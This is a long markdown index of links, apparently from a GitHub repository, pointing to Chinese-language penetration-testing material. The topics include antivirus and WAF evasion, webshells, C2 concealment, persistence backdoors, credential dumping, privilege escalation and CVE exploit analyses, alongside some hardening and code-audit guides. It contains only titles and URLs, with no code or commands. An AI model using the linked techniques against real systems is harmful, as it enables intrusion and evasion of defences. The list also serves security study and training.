- [bypass-av-note:免杀技术大杂烩---乱拳打死老师傅](https://github.com/Airboi/bypass-av-note)
- [Struts2 S2-061漏洞分析(CVE-2020-17530)](./books/Struts2%20S2-061漏洞分析(CVE-2020-17530).pdf)-[原文地址](https://mp.weixin.qq.com/s/RD2HTMn-jFxDIs4-X95u6g)
- [CVE-2020-10977-GitLab任意文件读取漏洞复现](./books/CVE-2020-10977-GitLab任意文件读取漏洞复现.pdf)-[原地址](https://mp.weixin.qq.com/s/ZmzXk0C-o0AnBLzVMAhRJg)
- [Linux后门N种姿势_fuckadmin](./books/Linux后门N种姿势_fuckadmin.pdf)
- [安全修复建议加固方案1.0](./books/安全修复建议加固方案1.0.pdf)
- [Web攻防之业务安全实战指南](./books/Web攻防之业务安全实战指南.pdf)
- [Linux基线加固方案V1.0](./books/Linux基线加固方案V1.0.pdf)
- [php中函数禁用绕过的原理与利用](./books/php中函数禁用绕过的原理与利用.pdf)-[原文地址](https://mp.weixin.qq.com/s/_L379eq0kufu3CCHN1DdkA)
- [TP诸多限制条件下如何getshell](./books/TP诸多限制条件下如何getshell.pdf)-[原文地址](https://mp.weixin.qq.com/s/LaTNNjwDT1VzN6uA0Gq0-Q)
- [中间件内存马注入&冰蝎连接(附更改部分代码)](./books/中间件内存马注入&冰蝎连接(附更改部分代码).pdf)-[原文地址](https://mp.weixin.qq.com/s/eI-50-_W89eN8tsKi-5j4g)
- [用友NC6.5未授权文件上传漏洞分析](./books/X友NC6.5未授权文件上传漏洞分析.pdf)
- [钓鱼那些事(初入Office宏攻击)](./books/钓鱼那些事(初入Office宏攻击).pdf)-[原文地址](https://mp.weixin.qq.com/s/FEhpCV5wklOqLmRvMiv20g)
- [ZIP已知明文攻击深入利用](./books/ZIP已知明文攻击深入利用.pdf)-[原文地址](https://www.freebuf.com/articles/network/255145.html)
- [组件攻击链ThinkCMF高危漏洞分析与利用](./books/组件攻击链ThinkCMF高危漏洞分析与利用.pdf)-[原文地址](https://www.freebuf.com/articles/web/255184.html)
- [Struts2 s2-061 Poc分析](./books/Struts2%20s2-061%20Poc分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw)
- [内含 POC 丨漏洞复现之 S2-061(CVE-2020-17530)](./books/内含POC丨漏洞复现之S2-061(CVE-2020-17530).pdf)-[原文地址](https://mp.weixin.qq.com/s/uVybuJpkvGt3HCIbfYv1tw)
- [Kerberos相关攻击技巧(较全)](./books/Kerberos相关攻击技巧(较全)%20.pdf)-[原文地址](https://xz.aliyun.com/t/8690)
- [Intranet_Penetration_Tips-内网渗透TIPS](https://github.com/Ridter/Intranet_Penetration_Tips)
- [TimelineSec-2020年漏洞复现大全](https://github.com/TimelineSec/2020-Vulnerabilities)
- [Kerberos协议到票据伪造](./books/Kerberos协议到票据伪造.pdf)-[原文地址](https://www.zjun.info/2020/kerberos.html)
- [抓取HASH的10001种方法](./books/抓取HASH的10001种方法.pdf)-[原文地址](https://mp.weixin.qq.com/s/6mwms9LtLE6cK0ukpoSMmg)
- [C#免杀之自实现DNS服务器传输shellcode](./books/C#免杀之自实现DNS服务器传输shellcode.pdf)-[原文地址](https://xz.aliyun.com/t/8921)
- [ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP链](./books/ThinkPHP%20v3.2.X%EF%BC%88SQL%E6%B3%A8%E5%85%A5&%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%EF%BC%89%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96POP%E9%93%BE.pdf)-[原文地址](https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA)
- [exp-hub-漏洞复现、批量脚本](https://github.com/ybdt/exp-hub)
- [sign-逆向app的sign等参数的思路和体验, 安卓逆向, 安卓破解, 逆向app,爬虫解密](https://github.com/darbra/sign)
- [Report_Public-DVPNET 公开漏洞知识库](https://github.com/DVPNET/Report_Public)
- [DolphinPHP 1.4.2(_1.4.5)后台 GetShell](./books/DolphinPHP%201.4.2(_1.4.5)后台%20GetShell.pdf)-[原文地址](https://www.t00ls.net/thread-59636-1-1.html)
- [使用ICMP传递shellcode](./books/使用ICMP传递shellcode.pdf)-[原文地址](https://blog.romanrii.com/using-icmp-to-deliver-shellcode)
- [红队技巧:绕过ESET_NOD32抓取密码](./books/红队技巧:绕过ESET_NOD32抓取密码.pdf)-[原文地址](https://mp.weixin.qq.com/s/FaiNEUX2wcscotkyAqUO2Q)
- [路由器无限重启救砖之旅](./books/路由器无限重启救砖之旅.pdf)-[原文地址](https://www.anquanke.com/post/id/231493)
- [内网渗透测试:MySql的利用与提权思路总结](./books/内网渗透测试:MySql的利用与提权思路总结.pdf)-[原文地址](https://www.freebuf.com/articles/network/261917.html)
- [Windows后渗透之权限维持](./books/Windows后渗透之权限维持.pdf)-[原文地址](https://mp.weixin.qq.com/s/Yte_h5Ov_Atz_GHf7rcsIA)
- [hackerone-reports_有关hackerone上漏洞奖励前茅的地址,便于学习](https://github.com/reddelexc/hackerone-reports)
- [redteam_vul-红队作战中比较常遇到的一些重点系统漏洞整理](https://github.com/r0eXpeR/redteam_vul)
- [GetShell的姿势总结](./books/GetShell的姿势总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/LHWZLGW8SohoMDTDhk_cdA)
- [SharPyShell后渗透框架使用详解](./books/SharPyShell后渗透框架使用详解.pdf)-[原文地址](https://mp.weixin.qq.com/s/22DUmZUhrMLkAlUP5Sj6EQ)
- [向日葵软件在渗透测试中的应用](./books/向日葵软件在渗透测试中的应用.pdf)-[原文地址](https://mp.weixin.qq.com/s/5qzYynZI0bdaUnld0GhA4Q)
- [Exchange攻击链 CVE-2021-26855&CVE-2021-27065分析](./books/Exchange攻击链%20CVE-2021-26855&CVE-2021-27065分析.pdf)-[原文地址](https://paper.seebug.org/1501/)
- [【.Net代码审计】-.Net反序列化文章](https://github.com/Ivan1ee/NET-Deserialize)
- [记一次利用mssql上线(关键词:绕过360,远程下载)](./books/记一次利用mssql上线.pdf)
- [vuldebug-JAVA 漏洞调试项目,主要为复现、调试java相关的漏洞](https://github.com/0nise/vuldebug)
- [【红蓝对抗】SQL Server提权](./books/%E3%80%90%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97%E3%80%91SQL%20Server%E6%8F%90%E6%9D%83.pdf)-[原文地址](https://mp.weixin.qq.com/s/5LmC_-KK3SMjtxAGG-I4ag)
- [Apache Solr组件安全概览(历史漏洞集合)](./books/Apache%20Solr组件安全概览.pdf)-[原文地址](https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ)
- [Web安全服务渗透测试模板](./Web安全服务渗透测试模板.docx)
- [ThinkPHP v6.0.7 eval反序列化利用链](./books/ThinkPHP%20v6.0.7%20eval%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E9%93%BE.pdf)-[原文地址](https://xz.aliyun.com/t/9310)
- [PwnWiki-免费、自由、人人可编辑的漏洞库](https://www.pwnwiki.org/)
- [黑蚂蚁外贸网站系统SemCms代码审计思路分享](./books/黑蚂蚁外贸网站系统SemCms代码审计思路分享.pdf)
- [LightCMS全版本后台RCE 0day分析](./books/LightCMS全版本后台RCE%200day分析.pdf)
- [全球鹰实验室技术文章沉淀](https://www.studysec.com/)
- [ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc](./books/ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc.pdf)
- [yii2 反序列化写shell方式利用](./books/yii2%20反序列化写shell方式利用.pdf)
- [如何制作冰蝎JSP免杀WebShell](./books/如何制作冰蝎JSP免杀WebShell.pdf)
- [HVV行动之泛OA流量应急](./books/HVV行动之泛OA流量应急.pdf)
- [Java代码执行漏洞中类动态加载的应用](./books/Java代码执行漏洞中类动态加载的应用.pdf)
- [记一次tp5.0.24 getshell](./books/记一次tp5.0.24%20getshell.pdf)-[原文地址](https://xz.aliyun.com/t/9112)
- [代码审计之youdiancms最新版getshell漏洞](./books/代码审计之youdiancms最新版getshell漏洞.pdf)
- [x微E-Cology WorkflowServiceXml RCE](./books/x微E-Cology%20WorkflowServiceXml%20RCE.pdf)
- [某通用流程化管控平台编辑器SSRF到axis的RCE之旅](./books/某通用流程化管控平台编辑器SSRF到axis的RCE之旅.pdf)
- [手把手教你如何制作钓鱼软件反制红队](./books/手把手教你如何制作钓鱼软件反制红队.pdf)
- [记一次绕过火绒安全提权实战案例](./books/记一次绕过火绒安全提权实战案例.pdf)
- [Vulnerability-不定期从棱角社区对外进行公布的一些最新漏洞](https://github.com/EdgeSecurityTeam/Vulnerability)
- [Webshell之全方位免杀技巧汇总](./books/Webshell之全方位免杀技巧汇总.pdf)
- [Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析](./books/Thinkphp%205.0.x_5.1.x%20变量覆盖%20RCE%20漏洞分析.pdf)
- [TP5.0.xRCE&5.0.24反序列化分析](./books/TP5.0.xRCE&5.0.24反序列化分析.pdf)
- [记一次有趣的tp5代码执行](./books/记一次有趣的tp5代码执行.pdf)
- [ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析](./books/ThinkPHP%205.0.0_5.0.23%20RCE%20漏洞分析.pdf)
- [记一次tp5.0.24](./books/记一次tp5.0.24.pdf)
- [权限维持_Windows内核_驱动断链隐藏技术](./books/权限维持_Windows内核_驱动断链隐藏技术.pdf)
- [某邮件系统后台管理员任意登录分析](./books/某邮件系统后台管理员任意登录分析.pdf)
- [隐藏CS源IP,提高溯源难度的几种方案](./books/隐藏CS源IP,提高溯源难度的几种方案.pdf)
- [CS使用请求转发隐藏真实IP](.books/CS使用请求转发隐藏真实IP.pdf)
- [go免杀初探](./books/go免杀初探.pdf)
- [记一次绕过防火墙反弹转发姿势小结](./books/记一次绕过防火墙反弹转发姿势小结.pdf)
- [内网渗透中如何离线解密 RDP 保存的密码](./books/内网渗透中如何离线解密%20RDP%20保存的密码.pdf)
- [Gadgets:Java反序列化漏洞利用链补全计划,仅用于个人归纳总结](https://github.com/0range228/Gadgets)
- [Java-Rce-Echo:Java RCE 回显测试代码](https://github.com/feihong-cs/Java-Rce-Echo)
- [利用heroku隐藏C2服务器](./books/利用heroku隐藏C2服务器.pdf)
- [SQL注入基础整理及Tricks总结](./books/SQL注入基础整理及Tricks总结.pdf)
- [利用netplwiz.exe Bypass UAC](./books/利用netplwiz.exe_Bypass_UAC.pdf)
- [dscmsV2.0二次注入及任意文件删除漏洞分析](./books/dscmsV2.0二次注入及任意文件删除漏洞分析.pdf)
- [脏牛提权复现以及如何得到一个完全交互的shell](./books/脏牛提权复现以及如何得到一个完全交互的shell.pdf)
- [在没有执行和写入权限下注入shellcode-Process Injection without Write_Execute Permission](./books/Process20%Injection20%without20%Write_Execute20%Permission20%_20%Ret2Pwn.pdf)
- [利用PHAR协议进行PHP反序列化攻击](./books/利用PHAR协议进行PHP反序列化攻击.pdf)
- [Seacms代码审计小结(后台多处getshell)](./books/Seacms代码审计小结(后台多处getshell).pdf)-[原文地址](https://xz.aliyun.com/t/9777)
- [SpringBoot 框架华夏 ERP 源码审计『java代码审计』](./books/SpringBoot20%框架华夏20%ERP20%源码审计.pdf)|[华夏ERP_v2.3.1最新版SQL与RCE的审计过程](./books/华夏ERP_v2.3.1最新版SQL与RCE的审计过程.pdf)
- [盘企LCMS的代码审计『CNVD-2021-28469』](./books/盘企LCMS的代码审计『CNVD-2021-28469』.pdf)-[原文地址](https://xz.aliyun.com/t/9800)
- [科迈 RAS4.0 审计分析](./books/科迈20%RAS4.020%审计分析.pdf)-[原文地址](https://xz.aliyun.com/t/9809)
- [vulnerability-paper:渗透测试、PTE、免杀、靶场复现、hw、内网后渗透、oscp、等收集文章](https://github.com/MrWQ/vulnerability-paper)
- [IoT安全教程系列](https://github.com/G4rb3n/IoT_Sec_Tutorial)
- [关于file_put_contents的一些小测试](./books/关于file_put_contents的一些小测试.pdf)
- [Discuz渗透总结](./books/Discuz渗透总结.pdf)
- [攻击工具分析:哥斯拉(Godzilla)](./books/攻击工具分析:哥斯拉(Godzilla).pdf)
- [干货|CS免杀和使用](./books/干货|CS免杀和使用.pdf)
- [代码审计之彩虹代刷网系统](./books/代码审计之彩虹代刷网系统.pdf)
- [Redis常见漏洞利用方法总结](./books/Redis常见漏洞利用方法总结.pdf)|[Redis系列漏洞总结](./books/Redis系列漏洞总结.pdf)
- [加密固件之依据老固件进行解密](./books/加密固件之依据老固件进行解密.pdf)
- [Bypass Disable Functions 总结](./books/Bypass%20Disable%20Functions%20总结.pdf)
- [施耐德充电桩漏洞挖掘之旅【IOT设备漏洞挖掘】](./books/施耐德充电桩漏洞挖掘之旅.pdf)
- [微擎最新版前台某处无回显SSRF漏洞](./books/微擎最新版前台某处无回显SSRF漏洞.pdf)
- [SpringMVC配合Fastjson的内存马利用与分析](./books/SpringMVC配合Fastjson的内存马利用与分析.pdf)
- [php反序列化逃逸](./books/php反序列化逃逸.pdf)
- [手把手教你Windows提权【翻译文章】](./books/手把手教你Windows提权【翻译文章】.pdf)
- [免杀转储lsass进程技巧](./books/免杀转储lsass进程技巧.pdf)
- [Java内存攻击技术漫谈](./books/Java内存攻击技术漫谈.pdf)
- [内网域渗透-WMI 横向移动](./books/内网域渗透-WMI%20横向移动.pdf)
- [零起飞CRM管理系统(07FLY-CRM)-代码审计(任意文件删除+RCE+任意文件上传+SQL注入)](./books/%E9%9B%B6%E8%B5%B7%E9%A3%9ECRM%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%EF%BC%8807FLY-CRM%EF%BC%89-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4+RCE+%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0+SQL%E6%B3%A8%E5%85%A5%EF%BC%89.pdf)
- [盘企-LCMS代码审计(vv2021.0521152900+v2021.0528154955)](./books/%E7%9B%98%E4%BC%81-LCMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88vv2021.0521152900+v2021.0528154955%EF%BC%89.pdf)
- [zzcms2020代码审计](./books/zzcms2020代码审计.pdf)
- [Spring渗透合集](./books/Spring渗透合集.pdf)
- [Jboss渗透合集](./books/Jboss渗透合集.pdf)
- [使用DCOM进行横向渗透](./books/使用DCOM进行横向渗透.pdf)
- [Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软](./books/Invoke-Obfuscation-Bypass%20+%20PS2EXE%20%E7%BB%95%E8%BF%87%E4%B8%BB%E6%B5%81%E6%9D%80%E8%BD%AF.pdf)
- [python反序列化-分离免杀](./books/python反序列化-分离免杀.pdf)
- [JWT安全(总结得很全面)](./books/JWT安全(总结得很全面).pdf)
- [Active Directory 证书服务(一)](./books/Active%20Directory%20证书服务(一).pdf)
- [CS4.4原版使用手册-csmanual44](./books/csmanual44.pdf)
- [tomcat漏洞大杂烩](./books/tomcat漏洞大杂烩.pdf)
- [linux suid权限维持速查表](./books/linux%20suid权限维持速查表.pdf)
- [从0学习bypass open_basedir姿势](./books/从0学习bypass%20open_basedir姿势.pdf)
- [HackerOneReports:hacker历年公开的漏洞报告](https://github.com/aldaor/HackerOneReports)
- [从JDBC到h2 database任意命令执行](./books/从JDBC到h2%20database任意命令执行.pdf)
- [Confluence Servers RCE 漏洞(CVE-2021-26084)分析](https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md)
- [secguide:面向开发人员梳理的代码安全指南](https://github.com/Tencent/secguide)
- [JDBC-Attack:当 JDBC Connection URL 可控的情况下,可以做那些攻击](https://github.com/su18/JDBC-Attack)
- [从ByteCTF到bypass_disable_function](./books/从ByteCTF到bypass_disable_function.pdf)
- [利用安全描述符隐藏服务后门进行权限维持](./books/利用安全描述符隐藏服务后门进行权限维持.pdf)
- [理解 Windows 域渗透-Understanding_Windows_Lateral_Movements](./books/理解%20Windows%20域渗透-Understanding_Windows_Lateral_Movements.pdf)
- [DLL劫持快速挖掘教程](./books/DLL劫持快速挖掘教程.pdf)
- [Bypass_AV - Windows Defender](./books/Bypass_AV%20-%20Windows%20Defender.pdf)
- [Chasing a Dream-Pre-authenticated Remote Code Execution in Dedecms](./books/Chasing%20a%20Dream-Pre-authenticated%20Remote%20Code%20Execution%20in%20Dedecms.pdf)
- [RMI反序列化及相关工具反制浅析](./books/RMI反序列化及相关工具反制浅析.pdf)
- [waf绕过之标签绕过](./books/waf绕过之标签绕过.pdf)
- [oracle注入绕狗](./books/oracle注入绕狗.pdf)
- [内网学习笔记合集_TeamsSix.pdf](./books/内网学习笔记合集_TeamsSix.pdf.7z)
- [CobaltStrike_RedTeam_CheatSheet:一些实战中CS常用的小技巧](https://github.com/wsummerhill/CobaltStrike_RedTeam_CheatSheet)
- [CmsEasy代码审计](./books/CmsEasy代码审计.pdf)
- [AppCMS_v2.0_代码审计](./books/AppCMS_v2.0_代码审计.pdf)
- [记一次曲折的WAF绕过](./books/记一次曲折的WAF绕过.pdf)
- [flask_memory_shell:Flask 内存马](https://github.com/iceyhexman/flask_memory_shell)
- [Telegram下的C2创建过程](./books/Telegram下的C2创建过程.pdf)
- [PbootCms-3.04前台RCE挖掘过](./books/PbootCms-3.04前台RCE挖掘过.pdf)
- [pBootCMS 3.0.4 前台注入漏洞复现](./books/pBootCMS%203.0.4%20前台注入漏洞复现.pdf)
- [记一次授权测试到顺手挖一个0day(pBootCMS)](./books/记一次授权测试到顺手挖一个0day(pBootCMS).pdf)
- [CobaltStrike4.X之去除CheckSum8特征](./books/CobaltStrike4.X之去除CheckSum8特征.pdf)
- [JBoss中间件漏洞总结](./books/JBoss中间件漏洞总结.pdf)
- [一篇文章带你入门Oracle注入](./books/一篇文章带你入门Oracle注入.pdf)
- [DNS Over HTTPS for Cobalt Strike(将 DoH 与 Cobalt Strike 结合使用, 无需第三方帐户或基础设施设置, 使用有效的 SSL 证书加密流量, 并将流量发送到信誉良好的域名)](./books/DNS%20Over%20HTTPS%20for%20Cobalt%20Strike(将%20DoH%20与%20Cobalt%20Strike%20结合使用,%20无需第三方帐户或基础设施设置,%20使用有效的%20SSL%20证书加密流量,%20并将流量发送到信誉良好的域名).pdf)
- [鱼跃CMS审计-后台多处文件上传](./books/鱼跃CMS审计-后台多处文件上传.pdf)
- [learning-codeql:CodeQL Java 全网最全的中文学习资料](https://github.com/SummerSec/learning-codeql)
- [taocms审计](./books/taocms审计.pdf)
- [shiroMemshell:利用shiro反序列化注入冰蝎内存马](https://github.com/yyhuni/shiroMemshell)
- [浅谈Windows环境下的命令混淆](./books/浅谈Windows环境下的命令混淆.pdf)
- [Dump内存得到TeamViewer账号密码](./books/Dump内存得到TeamViewer账号密码.pdf)
- [打破基于OpenResty的WEB安全防护(CVE-2018-9230)](./books/打破基于OpenResty的WEB安全防护(CVE-2018-9230).pdf)
- [Advanced-SQL-Injection-Cheatsheet:一个有关 SQL 注入的检查 payload 清单](https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet)
- [MeterSphere PluginController Pre-auth RCE(MeterSphere 匿名接口远程命令执行漏洞分析)](./books/MeterSphere%20PluginController%20Pre-auth%20RCE(MeterSphere%20匿名接口远程命令执行漏洞分析).pdf)
- [ClassCMS 2.4代码审计](./books/ClassCMS%202.4代码审计.pdf)
- [phpyun人才招聘系统最新版v5.1.5漏洞挖掘](./books/phpyun人才招聘系统最新版v5.1.5漏洞挖掘.pdf)
- [CTF中几种通用的sql盲注手法和注入的一些tips](./books/CTF中几种通用的sql盲注手法和注入的一些tips.pdf)
- [Source-and-Fuzzing:一些阅读源码和Fuzzing 的经验,涵盖黑盒与白盒测试](https://github.com/lcatro/Source-and-Fuzzing)
- [SSRF的那些问题](./books/SSRF的那些问题.pdf)
- [SSRF Tricks小结](./books/SSRF%20Tricks小结.pdf)
- [windows-protocol:针对内网渗透的常见协议(如kerberos,ntlm,smb,ldap,netbios等)进行分析,介绍相关漏洞分析以及漏洞工具分析利用文章集合](https://daiker.gitbook.io/windows-protocol/)
- [Parallels Desktop虚拟机逃逸](./books/Parallels%20Desktop虚拟机逃逸.pdf)|[源处](https://dawnslab.jd.com/pd-exploit-blog1/)
- [Zabbix攻击面挖掘与利用](./books/Zabbix攻击面挖掘与利用.pdf)
- [2020-2021年长亭技术文章合集](./books/2020-2021年长亭技术文章合集.pdf)
- [涉及漏洞、代码审计、内网渗透相关的笔记仓库](https://github.com/nbxiglk0/Note)
- [cscms代码审计-SSRF和文件覆盖 GETSHELL](./books/cscms代码审计-SSRF和文件覆盖%20GETSHELL.pdf)|[源处](https://xz.aliyun.com/t/10929)
- [ActiveMQ系列漏洞汇总复现-截止20220303](./books/ActiveMQ系列漏洞汇总复现-截止20220303.pdf)|[源处](https://mp.weixin.qq.com/s/5U7v22q2WeLmCnkq7mfr8w)
- [pentest-note:渗透测试☞经验/思路/想法/总结/笔记](https://github.com/pen4uin/pentest-note)
- [CodeQL:深入理解CodeQL](https://github.com/ASTTeam/CodeQL)
- [CodeqlNote:Codeql学习笔记](https://github.com/safe6Sec/CodeqlNote)
- [Fastjson:Fastjson姿势技巧集合](https://github.com/safe6Sec/Fastjson)
- [command:红队常用命令速查](https://github.com/safe6Sec/command)
- [shiro_key:shiro key 收集 目前 1k+](https://github.com/yanm1e/shiro_key)
- [IoT-CTF-2021:2021 西湖论剑 IoT-CTF 赛题仓库](https://github.com/DasSecurity-HatLab/IoT-CTF-2021)
- [CodeQLRule:个人使用CodeQL编写的一些规则](https://github.com/ice-doom/CodeQLRule)
- [ReZeroBypassAV:从零开始学免杀](https://github.com/luckyfuture0177/ReZeroBypassAV)
- [struts2绕过waf读写文件及另类方式执行命令](./books/struts2绕过waf读写文件及另类方式执行命令.pdf)
- [sqlps替代powershell](./books/sqlps替代powershell.pdf)
- [go-sec-code:Go相关的安全研究](https://github.com/leveryd/go-sec-code)
- [Awesome-RedTeam-Cheatsheet:Active Directory & Red-Team Cheat-Sheet](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet)
- [HackJava:Java安全](https://github.com/HackJava/HackJava)
- [code-review-lab:代码审计☞Go/PHP/Python/.NET](https://github.com/pen4uin/code-review-lab)
- [RedTeamNotes:红对笔记,记录日常红对项目遇到的问题以及解决方案](https://github.com/biggerduck/RedTeamNotes)
- [sec-note:记录各语言、框架中危险的sink](https://github.com/haby0/sec-note)
- [JavaVulnSummary:Java漏洞分析汇合](https://github.com/R17a-17/JavaVulnSummary)
- [GetDomainAdmin:获取域控权限的几种方式](https://github.com/JDArmy/GetDomainAdmin)
- [my-re0-k8s-security:整理过去的分享,从零开始的Kubernetes攻防](https://github.com/neargle/my-re0-k8s-security)
- [PHPAuditGuideBook:PHP代码审计入门指南](https://github.com/burpheart/PHPAuditGuideBook)
- [awesome-java-security:Java安全☞代码审计/漏洞分析/武器化](https://github.com/pen4uin/awesome-java-security)
- [迅睿CMSv4.3.3到v4.5.1后台任意代码注入漏洞(文件写入加文件包含)](./books/迅睿CMSv4.3.3到v4.5.1后台任意代码注入漏洞(文件写入加文件包含).pdf)|[原文](https://xz.aliyun.com/t/11425)
- [域渗透之外网打点到三层内网](./books/域渗透之外网打点到三层内网.pdf)|[原文](https://xz.aliyun.com/t/11432)
- [Django SQL注入历史漏洞分析](./books/Django%20SQL注入历史漏洞分析.pdf)|[原文](https://xz.aliyun.com/t/11422)
- [从SQL注入绕过最新安全狗WAF中学习fuzz](./books/从SQL注入绕过最新安全狗WAF中学习fuzz.pdf)|[原文](https://xz.aliyun.com/t/11412)
- [谁能比我细---秒懂Http请求走私(超详细)](./books/谁能比我细---秒懂Http请求走私(超详细).pdf)|[原文](https://xz.aliyun.com/t/11423)
- [webshell免杀-提升兼容性](./books/webshell免杀-提升兼容性.pdf)|[原文](https://xz.aliyun.com/t/11391)
- [JavaSec:一个记录Java安全学习过程的仓库](https://github.com/Y4tacker/JavaSec)
- [探寻Tomcat文件上传流量层面绕waf新姿势](./books/探寻Tomcat文件上传流量层面绕waf新姿势.pdf)
- [探寻Java文件上传流量层面waf绕过姿势系列二](https://y4tacker.github.io/2022/06/21/year/2022/6/%E6%8E%A2%E5%AF%BBJava%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2waf%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF%E7%B3%BB%E5%88%97%E4%BA%8C/)|[备份](https://archive.ph/NJPgS)
- [Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet)
- [javasec:java安全的一些总结,主要是安全审计相关](https://github.com/Maskhe/javasec)
- [JavaCodeAudit:JAVA代码审计入门的小项目](https://github.com/cn-panda/JavaCodeAudit)
- [Privilege-Escalation:提权相关知识](https://github.com/Ignitetechnologies/Privilege-Escalation)
- [CTF-Writeups](https://github.com/0e85dc6eaf/CTF-Writeups)
- [Binary-Learning:二进制安全相关的学习笔记](https://github.com/gh0stkey/Binary-Learning)
- [.NET-Bypass:.NET 免杀绕过、Tricks方法合集](https://github.com/Ivan1ee/.NET-Bypass)
- [JavaLearnVulnerability:Java漏洞学习笔记](https://github.com/SummerSec/JavaLearnVulnerability)
- [injection-stuff:各种注入 PE 注入、DLL 注入、进程注入、线程注入、代码注入、shellcode 注入、ELF 注入、Dylib注入相关400+工具和350+文章的收集仓库](https://github.com/alphaSeclab/injection-stuff)
- [Information_Security_Books:信息安全方面的书籍书籍](https://github.com/olist213/Information_Security_Books)
- [Process-Injection:汇总了目前可以找到的所有的进程注入的方式,完成了x86/x64下的测试](https://github.com/Gality369/Process-Injection)
- [Windows-Red-Team-Cheat-Sheet:红对常用 Windows 命备忘录](https://github.com/morph3/Windows-Red-Team-Cheat-Sheet)
- [Vulnerability-Wiki:一个综合漏洞知识库,集成了Vulhub、Peiqi、Edge、0sec、Wooyun等开源漏洞库](https://github.com/Threekiii/Vulnerability-Wiki)
- [OSCP-Tips:备考 OSCP 的各种干货资料](https://github.com/YJ5NP1/OSCP-Tips)
- [Attack_Code:云安全入门材料](https://github.com/Esonhugh/Attack_Code)
- [pentest-book:这本书包含了在渗透测试期间使用的大量信息、脚本和知识](https://github.com/six2dez/pentest-book)
- [OSCP-Human-Guide:一位播主的OSCP指南](https://github.com/six2dez/OSCP-Human-Guide)
- [SQLInjectionWiki:一个专注于聚合和记录各种 SQL 注入方法的 wiki](https://github.com/NetSPI/SQLInjectionWiki)
- [蓝凌OA历史漏洞](./books/蓝凌OA历史漏洞.pdf)|[备份](https://archive.ph/HTfNW)
- [对Ruoyi若依系统渗透测试总结](./books/对Ruoyi若依系统渗透测试总结.pdf)
- [玄武盾的几种绕过姿势](./books/玄武盾的几种绕过姿势.pdf)
- [SnakeYaml反序列化](./books/SnakeYaml反序列化.pdf)
- [CVE-2022-35741 Apache CloudStack SAML XXE注入](./books/CVE-2022-35741%20Apache%20CloudStack%20SAML%20XXE注入.pdf)
- [MSF多层内网渗透全过程](./books/MSF多层内网渗透全过程.pdf)
- [ThinkPHP V6.0.12LTS 反序列化漏洞的保姆级教程(含exp编写过程)](./books/ThinkPHP%20V6.0.12LTS%20反序列化漏洞的保姆级教程(含exp编写过程).pdf)
- [CVE-2022-35405 Zoho Password Manager Pro XML-RPC RCE](./books/CVE-2022-35405%20Zoho%20Password%20Manager%20Pro%20XML-RPC%20RCE.pdf)
- [DzzOffice2.02前台RCE分析](./books/某Office2.02前台RCE分析.pdf)
- [不删除_key_的CC6反序列化](./books/不删除_key_的CC6反序列化.pdf)
- [域渗透之委派攻击全集](./books/域渗透之委派攻击全集.pdf)
- [某次红蓝对抗之Solr-RCE实战绕过](./books/某次红蓝对抗之Solr-RCE实战绕过.pdf)
- [CVE-2022-0540_ Jira身份验证绕过分析](./books/CVE-2022-0540_%20Jira身份验证绕过分析.pdf)
- [WebSocket 内存马,一种新型内存马技术](./books/WebSocket%20内存马,一种新型内存马技术.pdf)
- [Mysql蜜罐反制Cobalt Strike](./books/Mysql蜜罐反制Cobalt%20Strike.pdf)
- [利用 PHP-FPM 做内存马的方法](https://tttang.com/archive/1720/)|[备份](https://web.archive.org/save/https://tttang.com/archive/1720/)
- [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A)|[备份](https://archive.ph/BVZmr)
- [got表劫持绕过disable_functions](https://mp.weixin.qq.com/s/jfxcjQJzu-kv_V0E6snfnw)|[备份](https://archive.ph/dkwGu)
- [Executor内存马的实现](https://xz.aliyun.com/t/11593)|[备份](https://archive.ph/v2TWM)
- [Executor内存马的实现(二)](https://xz.aliyun.com/t/11613)|[备份](https://archive.ph/6pzxq)
- [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709/)|[备份](https://archive.ph/wip/SmeAe)
- [Shiro 历史漏洞分析](https://xz.aliyun.com/t/11633)|[备份](https://archive.ph/wip/g5nMw)
- [ThinkPHP 5.0.X代码审计-5.0.24反序列化](./books/ThinkPHP%205.0.X代码审计-5.0.24反序列化.pdf)|[备份](https://archive.ph/wip/BqWdO)|[备份](https://web.archive.org/web/20220831131512/https://xz.aliyun.com/t/11658)
- [利用Nginx、Tyk Gateway API和CloudFlare防火墙隐藏C2设施](./books/利用Nginx、Tyk%20Gateway%20API和CloudFlare防火墙隐藏C2设施.pdf)
- [WIKI-POC-EXP:收集各大文库集合+POC+EXP(pochouse,peiqi_wiki,棱角社区,零组等)](https://github.com/govbk/WIKI-POC-EXP)
- [云上安全攻防实战手册](./books/云上安全攻防实战手册.pdf)
